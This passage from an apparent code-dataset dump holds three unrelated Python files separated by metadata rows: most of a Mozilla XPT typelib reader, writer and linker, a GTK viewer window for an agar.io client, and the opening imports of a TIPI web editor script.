self.length_is_arg_num))
def __str__(self):
return "string_s"
class WideStringWithSizeType(Type):
"""
A type representing a UTF-16 encoded string whose size and length
are passed as separate arguments to a method.
(WideStringWithSizeTypeDescriptor from the typelib specification.)
"""
_descriptor = struct.Struct(">BB")
def __init__(self, size_is_arg_num, length_is_arg_num,
pointer=True, **kwargs):
if not pointer:
raise DataError("WideStringWithSizeType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.size_is_arg_num = size_is_arg_num
self.length_is_arg_num = length_is_arg_num
self.tag = Type.Tags.WideStringWithSize
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.size_is_arg_num, other.size_is_arg_num) or
cmp(self.length_is_arg_num, other.length_is_arg_num) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an WideStringWithSizeTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (WideStringWithSizeType, next offset),
where |next offset| is an offset suitable for reading the data
following this WideStringWithSizeTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(size_is_arg_num, length_is_arg_num) = WideStringWithSizeType._descriptor.unpack_from(map, start)
offset += WideStringWithSizeType._descriptor.size
return WideStringWithSizeType(size_is_arg_num, length_is_arg_num, **flags), offset
def write(self, typelib, file):
"""
Write a WideStringWithSizeTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(WideStringWithSizeType._descriptor.pack(self.size_is_arg_num,
self.length_is_arg_num))
def __str__(self):
return "wstring_s"
class Param(object):
"""
A parameter to a method, or the return value of a method.
(ParamDescriptor from the typelib specification.)
"""
_descriptorstart = struct.Struct(">B")
def __init__(self, type, in_=True, out=False, retval=False,
shared=False, dipper=False, optional=False):
"""
Construct a Param object with the specified |type| and
flags. Params default to "in".
"""
self.type = type
self.in_ = in_
self.out = out
self.retval = retval
self.shared = shared
self.dipper = dipper
self.optional = optional
def __cmp__(self, other):
return (
cmp(self.type, other.type) or
cmp(self.in_, other.in_) or
cmp(self.out, other.out) or
cmp(self.retval, other.retval) or
cmp(self.shared, other.shared) or
cmp(self.dipper, other.dipper) or
cmp(self.optional, other.optional)
)
@staticmethod
def decodeflags(byte):
"""
Given |byte|, an unsigned uint8 containing flag bits,
decode the flag bits as described in
http://www.mozilla.org/scriptable/typelib_file.html#ParamDescriptor
and return a dict of flagname: (True|False) suitable
for passing to Param.__init__ as **kwargs
"""
return {'in_': bool(byte & 0x80),
'out': bool(byte & 0x40),
'retval': bool(byte & 0x20),
'shared': bool(byte & 0x10),
'dipper': bool(byte & 0x08),
# XXX: Not in the spec, see:
# http://hg.mozilla.org/mozilla-central/annotate/0e0e2516f04e/xpcom/typelib/xpt/public/xpt_struct.h#l456
'optional': bool(byte & 0x04),
}
def encodeflags(self):
"""
Encode the flags of this Param. Return a byte suitable for
writing to a typelib file.
"""
flags = 0
if self.in_:
flags |= 0x80
if self.out:
flags |= 0x40
if self.retval:
flags |= 0x20
if self.shared:
flags |= 0x10
if self.dipper:
flags |= 0x08
if self.optional:
flags |= 0x04
return flags
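    # Worked example (added): 0xA0 has bits 0x80 and 0x20 set, so it decodes
    # to an "in retval" parameter, and encodeflags() reproduces the byte:
    #   Param.decodeflags(0xA0)  # -> in_=True, retval=True, all others False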
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a ParamDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Param, next offset),
where |next offset| is an offset suitable for reading the data
following this ParamDescriptor.
"""
start = data_pool + offset - 1
(flags,) = Param._descriptorstart.unpack_from(map, start)
        # only the first six bits are flags (see the 0x04 'optional' bit above)
flags &= 0xFC
flags = Param.decodeflags(flags)
offset += Param._descriptorstart.size
t, offset = Type.read(typelib, map, data_pool, offset)
p = Param(t, **flags)
return p, offset
def write(self, typelib, file):
"""
Write a ParamDescriptor to |file|, which is assumed to be seeked
to the correct position.
"""
file.write(Param._descriptorstart.pack(self.encodeflags()))
self.type.write(typelib, file)
def prefix(self):
"""
Return a human-readable string representing the flags set
on this Param.
"""
s = ""
if self.out:
if self.in_:
s = "inout "
else:
s = "out "
else:
s = "in "
if self.dipper:
s += "dipper "
if self.retval:
s += "retval "
if self.shared:
s += "shared "
if self.optional:
s += "optional "
return s
def __str__(self):
return self.prefix() + str(self.type)
class Method(object):
"""
A method of an interface, defining its associated parameters
and return value.
(MethodDescriptor from the typelib specification.)
"""
_descriptorstart = struct.Struct(">BIB")
def __init__(self, name, result,
params=[], getter=False, setter=False, notxpcom=False,
constructor=False, hidden=False, optargc=False,
implicit_jscontext=False):
self.name = name
self._name_offset = 0
self.getter = getter
self.setter = setter
self.notxpcom = notxpcom
self.constructor = constructor
self.hidden = hidden
self.optargc = optargc
self.implicit_jscontext = implicit_jscontext
self.params = list(params)
if result and not isinstance(result, Param):
raise Exception("result must be a Param!")
self.result = result
def __cmp__(self, other):
return (
cmp(self.name, other.name) or
cmp(self.getter, other.getter) or
cmp(self.setter, other.setter) or
cmp(self.notxpcom, other.notxpcom) or
cmp(self.constructor, other.constructor) or
cmp(self.hidden, other.hidden) or
cmp(self.optargc, other.optargc) or
cmp(self.implicit_jscontext, other.implicit_jscontext) or
cmp(self.params, other.params) or
cmp(self.result, other.result)
)
def read_params(self, typelib, map, data_pool, offset, num_args):
"""
Read |num_args| ParamDescriptors representing this Method's arguments
from the mmaped file |map| with data pool at the offset |data_pool|,
starting at |offset| into self.params. Returns the offset
suitable for reading the data following the ParamDescriptor array.
"""
for i in range(num_args):
p, offset = Param.read(typelib, map, data_pool, offset)
self.params.append(p)
return offset
def read_result(self, typelib, map, data_pool, offset):
"""
Read a ParamDescriptor representing this Method's return type
from the mmaped file |map| with data pool at the offset |data_pool|,
starting at |offset| into self.result. Returns the offset
suitable for reading the data following the ParamDescriptor.
"""
self.result, offset = Param.read(typelib, map, data_pool, offset)
return offset
@staticmethod
def decodeflags(byte):
"""
Given |byte|, an unsigned uint8 containing flag bits,
decode the flag bits as described in
http://www.mozilla.org/scriptable/typelib_file.html#MethodDescriptor
and return a dict of flagname: (True|False) suitable
for passing to Method.__init__ as **kwargs
"""
return {'getter': bool(byte & 0x80),
'setter': bool(byte & 0x40),
'notxpcom': bool(byte & 0x20),
'constructor': bool(byte & 0x10),
'hidden': bool(byte & 0x08),
# Not in the spec, see
# http://hg.mozilla.org/mozilla-central/annotate/0e0e2516f04e/xpcom/typelib/xpt/public/xpt_struct.h#l489
'optargc': bool(byte & 0x04),
'implicit_jscontext': bool(byte & 0x02),
}
def encodeflags(self):
"""
Encode the flags of this Method object, return a byte suitable
for writing to a typelib file.
"""
flags = 0
if self.getter:
flags |= 0x80
if self.setter:
flags |= 0x40
if self.notxpcom:
flags |= 0x20
if self.constructor:
flags |= 0x10
if self.hidden:
flags |= 0x08
if self.optargc:
flags |= 0x04
if self.implicit_jscontext:
flags |= 0x02
return flags
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a MethodDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Method, next offset),
where |next offset| is an offset suitable for reading the data
following this MethodDescriptor.
"""
start = data_pool + offset - 1
flags, name_offset, num_args = Method._descriptorstart.unpack_from(map, start)
# only the first seven bits are flags
flags &= 0xFE
flags = Method.decodeflags(flags)
name = Typelib.read_string(map, data_pool, name_offset)
m = Method(name, None, **flags)
offset += Method._descriptorstart.size
offset = m.read_params(typelib, map, data_pool, offset, num_args)
offset = m.read_result(typelib, map, data_pool, offset)
return m, offset
def write(self, typelib, file):
"""
Write a MethodDescriptor to |file|, which is assumed to be
seeked to the right position.
"""
file.write(Method._descriptorstart.pack(self.encodeflags(),
self._name_offset,
len(self.params)))
for p in self.params:
p.write(typelib, file)
self.result.write(typelib, file)
def write_name(self, file, data_pool_offset):
"""
Write this method's name to |file|.
Assumes that |file| is currently seeked to an unused portion
of the data pool.
"""
if self.name:
self._name_offset = file.tell() - data_pool_offset + 1
file.write(self.name + "\x00")
else:
self._name_offset = 0
class Constant(object):
"""
A constant value of a specific type defined on an interface.
    (ConstantDescriptor from the typelib specification.)
"""
_descriptorstart = struct.Struct(">I")
# Actual value is restricted to this set of types
# XXX: the spec lies, the source allows a bunch more
# http://hg.mozilla.org/mozilla-central/annotate/9c85f9aaec8c/xpcom/typelib/xpt/src/xpt_struct.c#l689
typemap = {Type.Tags.int16: '>h',
Type.Tags.uint16: '>H',
Type.Tags.int32: '>i',
Type.Tags.uint32: '>I'}
def __init__(self, name, type, value):
self.name = name
self._name_offset = 0
self.type = type
self.value = value
def __cmp__(self, other):
return (
cmp(self.name, other.name) or
cmp(self.type, other.type) or
cmp(self.value, other.value)
)
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a ConstDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Constant, next offset),
where |next offset| is an offset suitable for reading the data
following this ConstDescriptor.
"""
start = data_pool + offset - 1
(name_offset,) = Constant._descriptorstart.unpack_from(map, start)
name = Typelib.read_string(map, data_pool, name_offset)
offset += Constant._descriptorstart.size
# Read TypeDescriptor
t, offset = Type.read(typelib, map, data_pool, offset)
c = None
if isinstance(t, SimpleType) and t.tag in Constant.typemap:
tt = Constant.typemap[t.tag]
start = data_pool + offset - 1
(val,) = struct.unpack_from(tt, map, start)
offset += struct.calcsize(tt)
c = Constant(name, t, val)
return c, offset
def write(self, typelib, file):
"""
Write a ConstDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
file.write(Constant._descriptorstart.pack(self._name_offset))
self.type.write(typelib, file)
tt = Constant.typemap[self.type.tag]
file.write(struct.pack(tt, self.value))
def write_name(self, file, data_pool_offset):
"""
Write this constants's name to |file|.
Assumes that |file| is currently seeked to an unused portion
of the data pool.
"""
if self.name:
self._name_offset = file.tell() - data_pool_offset + 1
file.write(self.name + "\x00")
else:
self._name_offset = 0
def __repr__(self):
return "Constant(%s, %s, %d)" % (self.name, str(self.type), self.value)
class Interface(object):
"""
An Interface represents an object, with its associated methods
and constant values.
(InterfaceDescriptor from the typelib specification.)
"""
_direntry = struct.Struct(">16sIII")
_descriptorstart = struct.Struct(">HH")
UNRESOLVED_IID = "00000000-0000-0000-0000-000000000000"
def __init__(self, name, iid=UNRESOLVED_IID, namespace="",
resolved=False, parent=None, methods=[], constants=[],
scriptable=False, function=False, builtinclass=False,
main_process_scriptable_only=False):
self.resolved = resolved
# TODO: should validate IIDs!
self.iid = iid
self.name = name
self.namespace = namespace
# if unresolved, all the members following this are unusable
self.parent = parent
self.methods = list(methods)
self.constants = list(constants)
self.scriptable = scriptable
self.function = function
self.builtinclass = builtinclass
self.main_process_scriptable_only = main_process_scriptable_only
# For sanity, if someone constructs an Interface and passes
# in methods or constants, then it's resolved.
if self.methods or self.constants:
# make sure it has a valid IID
if self.iid == Interface.UNRESOLVED_IID:
raise DataError("Cannot instantiate Interface %s containing methods or constants with an unresolved IID" % self.name)
self.resolved = True
# These are only used for writing out the interface
self._descriptor_offset = 0
self._name_offset = 0
self._namespace_offset = 0
self.xpt_filename = None
def __repr__(self):
return "Interface('%s', '%s', '%s', methods=%s)" % (self.name, self.iid, self.namespace, self.methods)
def __str__(self):
return "Interface(name='%s', iid='%s')" % (self.name, self.iid)
def __hash__(self):
return hash((self.name, self.iid))
def __cmp__(self, other):
c = cmp(self.iid, other.iid)
if c != 0:
return c
c = cmp(self.name, other.name)
if c != 0:
return c
c = cmp(self.namespace, other.namespace)
if c != 0:
return c
# names and IIDs are the same, check resolved
if self.resolved != other.resolved:
if self.resolved:
return -1
else:
return 1
else:
if not self.resolved:
# both unresolved, but names and IIDs are the same, so equal
return 0
# When comparing parents, only look at the name.
if (self.parent is None) != (other.parent is None):
if self.parent is None:
return -1
else:
return 1
elif self.parent is not None:
c = cmp(self.parent.name, other.parent.name)
if c != 0:
return c
return (
cmp(self.methods, other.methods) or
cmp(self.constants, other.constants) or
cmp(self.scriptable, other.scriptable) or
cmp(self.function, other.function) or
cmp(self.builtinclass, other.builtinclass) or
cmp(self.main_process_scriptable_only, other.main_process_scriptable_only)
)
def read_descriptor(self, typelib, map, data_pool):
offset = self._descriptor_offset
if offset == 0:
return
start = data_pool + offset - 1
parent, num_methods = Interface._descriptorstart.unpack_from(map, start)
if parent > 0 and parent <= len(typelib.interfaces):
self.parent = typelib.interfaces[parent - 1]
# Read methods
offset += Interface._descriptorstart.size
for i in range(num_methods):
m, offset = Method.read(typelib, map, data_pool, offset)
self.methods.append(m)
# Read constants
start = data_pool + offset - 1
(num_constants, ) = struct.unpack_from(">H", map, start)
offset = offset + struct.calcsize(">H")
for i in range(num_constants):
c, offset = Constant.read(typelib, map, data_pool, offset)
self.constants.append(c)
# Read flags
start = data_pool + offset - 1
(flags, ) = struct.unpack_from(">B", map, start)
offset = offset + struct.calcsize(">B")
        # only the first four bits are flags
flags &= 0xf0
if flags & 0x80:
self.scriptable = True
if flags & 0x40:
self.function = True
if flags & 0x20:
self.builtinclass = True
if flags & 0x10:
self.main_process_scriptable_only = True
self.resolved = True
def write_directory_entry(self, file):
"""
Write an InterfaceDirectoryEntry for this interface
to |file|, which is assumed to be seeked to the correct offset.
"""
file.write(Interface._direntry.pack(Typelib.string_to_iid(self.iid),
self._name_offset,
self._namespace_offset,
self._descriptor_offset))
def write(self, typelib, file, data_pool_offset):
"""
Write an InterfaceDescriptor to |file|, which is assumed
to be seeked to the proper position. If this interface
is not resolved, do not write any data.
"""
if not self.resolved:
self._descriptor_offset = 0
return
self._descriptor_offset = file.tell() - data_pool_offset + 1
parent_idx = 0
if self.parent:
parent_idx = typelib.interfaces.index(self.parent) + 1
file.write(Interface._descriptorstart.pack(parent_idx, len(self.methods)))
for m in self.methods:
m.write(typelib, file)
file.write(struct.pack(">H", len(self.constants)))
for c in self.constants:
c.write(typelib, file)
flags = 0
if self.scriptable:
flags |= 0x80
if self.function:
flags |= 0x40
if self.builtinclass:
flags |= 0x20
if self.main_process_scriptable_only:
flags |= 0x10
file.write(struct.pack(">B", flags))
def write_names(self, file, data_pool_offset):
"""
Write this interface's name and namespace to |file|,
as well as the names of all of its methods and constants.
Assumes that |file| is currently seeked to an unused portion
of the data pool.
"""
if self.name:
self._name_offset = file.tell() - data_pool_offset + 1
file.write(self.name + "\x00")
else:
self._name_offset = 0
if self.namespace:
self._namespace_offset = file.tell() - data_pool_offset + 1
file.write(self.namespace + "\x00")
else:
self._namespace_offset = 0
for m in self.methods:
m.write_name(file, data_pool_offset)
for c in self.constants:
c.write_name(file, data_pool_offset)
class Typelib(object):
"""
A typelib represents one entire typelib file and all the interfaces
referenced within, whether defined entirely within the typelib or
merely referenced by name or IID.
Typelib objects may be instantiated directly and populated with data,
or the static Typelib.read method may be called to read one from a file.
"""
_header = struct.Struct(">16sBBHIII")
def __init__(self, version=TYPELIB_VERSION, interfaces=[], annotations=[]):
"""
Instantiate a new Typelib.
"""
self.version = version
self.interfaces = list(interfaces)
self.annotations = list(annotations)
self.filename = None
@staticmethod
def iid_to_string(iid):
"""
Convert a 16-byte IID into a UUID string.
"""
def hexify(s):
return ''.join(["%02x" % ord(x) for x in s])
return "%s-%s-%s-%s-%s" % (hexify(iid[:4]), hexify(iid[4:6]),
hexify(iid[6:8]), hexify(iid[8:10]),
hexify(iid[10:]))
@staticmethod
def string_to_iid(iid_str):
"""
Convert a UUID string into a 16-byte IID.
"""
s = iid_str.replace('-', '')
return ''.join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 2)])
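    # For example (illustrative), the two converters above are inverses:
    #   Typelib.iid_to_string(Typelib.string_to_iid(s)) == s
    # for any lower-case UUID string s.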
@staticmethod
def read_string(map, data_pool, offset):
if offset == 0:
return ""
sz = map.find('\x00', data_pool + offset - 1)
if sz == -1:
return ""
return map[data_pool + offset - 1:sz]
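    # Note: offsets into the data pool are 1-based throughout this format;
    # an offset of 0 means "no string".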
@staticmethod
def read(input_file):
"""
Read a typelib from |input_file| and return
the constructed Typelib object. |input_file| can be a filename
or a file-like object.
"""
filename = ""
data = None
expected_size = None
if isinstance(input_file, basestring):
filename = input_file
with open(input_file, "rb") as f:
st = os.fstat(f.fileno())
data = f.read(st.st_size)
expected_size = st.st_size
else:
data = input_file.read()
(magic,
major_ver,
minor_ver,
num_interfaces,
file_length,
interface_directory_offset,
data_pool_offset) = Typelib._header.unpack_from(data)
if magic != XPT_MAGIC:
raise FileFormatError("Bad magic: %s" % magic)
xpt = Typelib((major_ver, minor_ver))
xpt.filename = filename
if expected_size and file_length != expected_size:
raise FileFormatError("File is of wrong length, got %d bytes, expected %d" % (expected_size, file_length))
# XXX: by spec this is a zero-based file offset. however,
# the xpt_xdr code always subtracts 1 from data offsets
# (because that's what you do in the data pool) so it
# winds up accidentally treating this as 1-based.
# Filed as: https://bugzilla.mozilla.org/show_bug.cgi?id=575343
interface_directory_offset -= 1
# make a half-hearted attempt to read Annotations,
# since XPIDL doesn't produce any anyway.
start = Typelib._header.size
(anno, ) = struct.unpack_from(">B", data, start)
tag = anno & 0x7F
if tag == 0: # EmptyAnnotation
xpt.annotations.append(None)
# We don't bother handling PrivateAnnotations or anything
for i in range(num_interfaces):
# iid, name, namespace, interface_descriptor
start = interface_directory_offset + i * Interface._direntry.size
ide = Interface._direntry.unpack_from(data, start)
iid = Typelib.iid_to_string(ide[0])
name = Typelib.read_string(data, data_pool_offset, ide[1])
namespace = Typelib.read_string(data, data_pool_offset, ide[2])
iface = Interface(name, iid, namespace)
iface._descriptor_offset = ide[3]
iface.xpt_filename = xpt.filename
xpt.interfaces.append(iface)
for iface in xpt.interfaces:
iface.read_descriptor(xpt, data, data_pool_offset)
return xpt
def __repr__(self):
return "<Typelib with %d interfaces>" % len(self.interfaces)
def _sanityCheck(self):
"""
Check certain assumptions about data contained in this typelib.
Sort the interfaces array by IID, check that all interfaces
referenced by methods exist in the array.
"""
self.interfaces.sort()
for i in self.interfaces:
if i.parent and i.parent not in self.interfaces:
raise DataError("Interface %s has parent %s not present in typelib!" % (i.name, i.parent.name))
for m in i.methods:
for n, p in enumerate(m.params):
if isinstance(p, InterfaceType) and \
p.iface not in self.interfaces:
raise DataError("Interface method %s::%s, parameter %d references interface %s not present in typelib!" % (i.name, m.name, n, p.iface.name))
if isinstance(m.result, InterfaceType) and m.result.iface not in self.interfaces:
raise DataError("Interface method %s::%s, result references interface %s not present in typelib!" % (i.name, m.name, m.result.iface.name))
def writefd(self, fd):
# write out space for a header + one empty annotation,
# padded to 4-byte alignment.
headersize = (Typelib._header.size + 1)
if headersize % 4:
headersize += 4 - headersize % 4
fd.write("\x00" * headersize)
# save this offset, it's the interface directory offset.
interface_directory_offset = fd.tell()
# write out space for an interface directory
fd.write("\x00" * Interface._direntry.size * len(self.interfaces))
# save this offset, it's the data pool offset.
data_pool_offset = fd.tell()
# write out all the interface descriptors to the data pool
for i in self.interfaces:
i.write_names(fd, data_pool_offset)
i.write(self, fd, data_pool_offset)
# now, seek back and write the header
file_len = fd.tell()
fd.seek(0)
fd.write(Typelib._header.pack(XPT_MAGIC,
TYPELIB_VERSION[0],
TYPELIB_VERSION[1],
len(self.interfaces),
file_len,
interface_directory_offset,
data_pool_offset))
# write an empty annotation
fd.write(struct.pack(">B", 0x80))
# now write the interface directory
# XXX: bug-compatible with existing xpt lib, put it one byte
# ahead of where it's supposed to be.
fd.seek(interface_directory_offset - 1)
for i in self.interfaces:
i.write_directory_entry(fd)
def write(self, output_file):
"""
Write the contents of this typelib to |output_file|,
which can be either a filename or a file-like object.
"""
self._sanityCheck()
if isinstance(output_file, basestring):
with open(output_file, "wb") as f:
self.writefd(f)
else:
self.writefd(output_file)
def dump(self, out):
"""
Print a human-readable listing of the contents of this typelib
to |out|, in the format of xpt_dump.
"""
out.write("""Header:
Major version: %d
Minor version: %d
Number of interfaces: %d
Annotations:\n""" % (self.version[0], self.version[1], len(self.interfaces)))
for i, a in enumerate(self.annotations):
if a is None:
out.write(" Annotation #%d is empty.\n" % i)
out.write("\nInterface Directory:\n")
for i in self.interfaces:
out.write(" - %s::%s (%s):\n" % (i.namespace, i.name, i.iid))
if not i.resolved:
out.write(" [Unresolved]\n")
else:
if i.parent:
out.write(" Parent: %s::%s\n" % (i.parent.namespace,
i.parent.name))
out.write(""" Flags:
Scriptable: %s
BuiltinClass: %s
Function: %s\n""" % (i.scriptable and "TRUE" or "FALSE",
i.builtinclass and "TRUE" or "FALSE",
i.function and "TRUE" or "FALSE"))
out.write(" Methods:\n")
if len(i.methods) == 0:
out.write(" No Methods\n")
else:
for m in i.methods:
out.write(" %s%s%s%s%s%s%s %s %s(%s);\n" % (
m.getter and "G" or " ",
m.setter and "S" or " ",
m.hidden and "H" or " ",
m.notxpcom and "N" or " ",
m.constructor and "C" or " ",
m.optargc and "O" or " ",
m.implicit_jscontext and "J" or " ",
str(m.result.type),
m.name,
m.params and ", ".join(str(p) for p in m.params) or ""
))
out.write(" Constants:\n")
if len(i.constants) == 0:
out.write(" No Constants\n")
else:
for c in i.constants:
out.write(" %s %s = %d;\n" % (c.type, c.name, c.value))
def xpt_dump(file):
"""
Dump the contents of |file| to stdout in the format of xpt_dump.
"""
t = Typelib.read(file)
t.dump(sys.stdout)
def xpt_link(inputs):
"""
Link all of the xpt files in |inputs| together and return the result
as a Typelib object. All entries in inputs may be filenames or
file-like objects. Non-scriptable interfaces that are unreferenced
from scriptable interfaces will be removed during linking.
"""
def read_input(i):
if isinstance(i, Typelib):
return i
return Typelib.read(i)
if not inputs:
print >>sys.stderr, "Usage: xpt_link <destination file> <input files>"
return None
# This is the aggregate list of interfaces.
interfaces = []
# This will be a dict of replaced interface -> replaced with
# containing interfaces that were replaced with interfaces from
# another typelib, and the interface that replaced them.
merged_interfaces = {}
for f in inputs:
t = read_input(f)
interfaces.extend(t.interfaces)
# Sort interfaces by name so we can merge adjacent duplicates
interfaces.sort(key=operator.attrgetter('name'))
Result = enum('Equal', # Interfaces the same, doesn't matter
'NotEqual', # Interfaces differ, keep both
'KeepFirst', # Replace second interface with first
'KeepSecond') # Replace first interface with second
def compare(i, j):
"""
Compare two interfaces, determine if they're equal or
completely different, or should be merged (and indicate which
one to keep in that case).
"""
if i == j:
# Arbitrary, just pick one
return Result.Equal
if i.name != j.name:
if i.iid == j.iid and i.iid != Interface.UNRESOLVED_IID:
# Same IID but different names: raise an exception.
raise DataError(
"Typelibs contain definitions of interface %s"
" with different names (%s (%s) vs %s (%s))!" %
(i.iid, i.name, i.xpt_filename, j.name, j.xpt_filename))
# Otherwise just different interfaces.
return Result.NotEqual
# Interfaces have the same name, so either they need to be merged
# or there's a data error. Sort out which one to keep
if i.resolved != j.resolved:
# prefer resolved interfaces over unresolved
if j.resolved:
assert i.iid == j.iid or i.iid == Interface.UNRESOLVED_IID
# keep j
return Result.KeepSecond
else:
assert i.iid == j.iid or j.iid == Interface.UNRESOLVED_IID
# replace j with i
return Result.KeepFirst
elif i.iid != j.iid:
# Prefer unresolved interfaces with valid IIDs
if j.iid == Interface.UNRESOLVED_IID:
# replace j with i
assert not j.resolved
return Result.KeepFirst
elif i.iid == Interface.UNRESOLVED_IID:
# keep j
assert not i.resolved
return Result.KeepSecond
else:
# Same name but different IIDs: raise an exception.
raise DataError(
"Typelibs contain definitions of interface %s"
" with different IIDs (%s (%s) vs %s (%s))!" %
(i.name, i.iid, i.xpt_filename,
j.iid, j.xpt_filename))
raise DataError("No idea what happened here: %s:%s (%s), %s:%s (%s)" %
(i.name, i.iid, i.xpt_filename, j.name, j.iid, j.xpt_filename))
# Compare interfaces pairwise to find duplicates that should be merged.
i = 1
while i < len(interfaces):
res = compare(interfaces[i-1], interfaces[i])
if res == Result.NotEqual:
i += 1
elif res == Result.Equal:
# Need to drop one but it doesn't matter which
del interfaces[i]
elif res == Result.KeepFirst:
merged_interfaces[interfaces[i]] = interfaces[i-1]
del interfaces[i]
elif res == Result.KeepSecond:
merged_interfaces[interfaces[i-1]] = interfaces[i]
del interfaces[i-1]
# Now fixup any merged interfaces
def checkType(t):
if isinstance(t, InterfaceType) and t.iface in merged_interfaces:
t.iface = merged_interfaces[t.iface]
elif isinstance(t, ArrayType) and \
isinstance(t.element_type, InterfaceType) and \
t.element_type.iface in merged_interfaces:
t.element_type.iface = merged_interfaces[t.element_type.iface]
for i in interfaces:
# Replace parent references
if i.parent in merged_interfaces:
i.parent = merged_interfaces[i.parent]
for m in i.methods:
# Replace InterfaceType params and return values
checkType(m.result.type)
for p in m.params:
checkType(p.type)
# There's no need to have non-scriptable interfaces in a typelib, and
# removing them saves memory when typelibs are loaded. But we can't
# just blindly remove all non-scriptable interfaces, since we still
# need to know about non-scriptable interfaces referenced from
# scriptable interfaces.
worklist = set(i for i in interfaces if i.scriptable)
required_interfaces = set()
def maybe_add_to_worklist(iface):
if iface in required_interfaces or iface in worklist:
return
worklist.add(iface)
while worklist:
i = worklist.pop()
required_interfaces.add(i)
if i.parent:
maybe_add_to_worklist(i.parent)
for m in i.methods:
if isinstance(m.result.type, InterfaceType):
maybe_add_to_worklist(m.result.type.iface)
for p in m.params:
if isinstance(p.type, InterfaceType):
maybe_add_to_worklist(p.type.iface)
elif isinstance(p.type, ArrayType) and isinstance(p.type.element_type, InterfaceType):
maybe_add_to_worklist(p.type.element_type.iface)
interfaces = list(required_interfaces)
# Re-sort interfaces (by IID)
interfaces.sort()
return Typelib(interfaces=interfaces)
if __name__ == '__main__':
if len(sys.argv) < 3:
print >>sys.stderr, "xpt <dump|link> <files>"
sys.exit(1)
if sys.argv[1] == 'dump':
xpt_dump(sys.argv[2])
elif sys.argv[1] == 'link':
xpt_link(sys.argv[3:]).write(sys.argv[2])
|
mpl-2.0
| 720,056,686,050,744,700
| 35.57987
| 164
| 0.575311
| false
| 4.090698
| false
| false
| false
|
forairan/gagar
|
gagar/window.py
|
1
|
4373
|
from gi.repository import Gtk, Gdk
from agarnet.vec import Vec
class WorldViewer(object):
"""
Draws one world and handles keys/mouse.
Does not poll for events itself.
Calls input_subscriber.on_{key_pressed|mouse_moved}() methods on key/mouse input.
Calls draw_subscriber.on_draw_{background|cells|hud}() methods when drawing.
"""
INFO_SIZE = 300
def __init__(self, world):
self.world = world
self.player = None # the focused player, or None to show full world
# the class instance on which to call on_key_pressed and on_mouse_moved
self.input_subscriber = None
# same for draw_background, draw_cells, draw_hud
self.draw_subscriber = None
self.win_size = Vec(1000, 1000 * 9 / 16)
self.screen_center = self.win_size / 2
self.screen_scale = 1
self.world_center = Vec(0, 0)
self.mouse_pos = Vec(0, 0)
window = Gtk.Window()
window.set_title('agar.io')
window.set_default_size(self.win_size.x, self.win_size.y)
window.connect('delete-event', Gtk.main_quit)
self.drawing_area = Gtk.DrawingArea()
window.add(self.drawing_area)
window.set_events(Gdk.EventMask.POINTER_MOTION_MASK)
window.connect('key-press-event', self.key_pressed)
window.connect('motion-notify-event', self.mouse_moved)
window.connect('button-press-event', self.mouse_pressed)
self.drawing_area.connect('draw', self.draw)
window.show_all()
def focus_player(self, player):
"""Follow this client regarding center and zoom."""
self.player = player
self.world = player.world
def show_full_world(self, world=None):
"""
Show the full world view instead of one client.
:param world: optionally update the drawn world
"""
self.player = None
if world:
self.world = world
def key_pressed(self, _, event):
"""Called by GTK. Set input_subscriber to handle this."""
if not self.input_subscriber: return
val = event.keyval
try:
char = chr(val)
except ValueError:
char = ''
self.input_subscriber.on_key_pressed(val=val, char=char)
def mouse_moved(self, _, event):
"""Called by GTK. Set input_subscriber to handle this."""
if not self.input_subscriber: return
self.mouse_pos = Vec(event.x, event.y)
pos_world = self.screen_to_world_pos(self.mouse_pos)
self.input_subscriber.on_mouse_moved(pos=self.mouse_pos, pos_world=pos_world)
def mouse_pressed(self, _, event):
"""Called by GTK. Set input_subscriber to handle this."""
if not self.input_subscriber: return
self.input_subscriber.on_mouse_pressed(button=event.button)
def world_to_screen_pos(self, world_pos):
return (world_pos - self.world_center) \
.imul(self.screen_scale).iadd(self.screen_center)
def screen_to_world_pos(self, screen_pos):
return (screen_pos - self.screen_center) \
.idiv(self.screen_scale).iadd(self.world_center)
def world_to_screen_size(self, world_size):
return world_size * self.screen_scale
def recalculate(self):
alloc = self.drawing_area.get_allocation()
self.win_size.set(alloc.width, alloc.height)
self.screen_center = self.win_size / 2
if self.player: # any client is focused
window_scale = max(self.win_size.x / 1920, self.win_size.y / 1080)
self.screen_scale = self.player.scale * window_scale
self.world_center = self.player.center
self.world = self.player.world
elif self.world.size:
self.screen_scale = min(self.win_size.x / self.world.size.x,
self.win_size.y / self.world.size.y)
self.world_center = self.world.center
else:
# happens when the window gets drawn before the world got updated
self.screen_scale = 1
self.world_center = Vec(0, 0)
def draw(self, _, c):
if self.draw_subscriber:
self.recalculate()
self.draw_subscriber.on_draw_background(c, self)
self.draw_subscriber.on_draw_cells(c, self)
self.draw_subscriber.on_draw_hud(c, self)
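# Illustrative subscriber sketch (added; not part of the original module):
# any object exposing these callbacks can be assigned to input_subscriber.
# The draw_subscriber side works the same way with on_draw_background(),
# on_draw_cells() and on_draw_hud(), each receiving (cairo_context, viewer).
class _EchoInputSubscriber(object):
    def on_key_pressed(self, val, char):
        print('key pressed:', val, repr(char))
    def on_mouse_moved(self, pos, pos_world):
        print('mouse at', pos, '->', pos_world)
    def on_mouse_pressed(self, button):
        print('button', button)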
|
gpl-3.0
| 2,771,065,779,682,986,500
| 36.059322
| 85
| 0.61308
| false
| 3.677881
| false
| false
| false
|
jedimatt42/pi-messaging
|
htdocs/tipi_editor.py
|
1
|
3428
|
# tipi_editor
#
# TIPI web administration
#
# Corey J. Anderson ElectricLab.com 2017
# et al.
import os
import logging
import uuid
from ti_files import ti_files
from subprocess import call
logger = logging.getLogger(__name__)
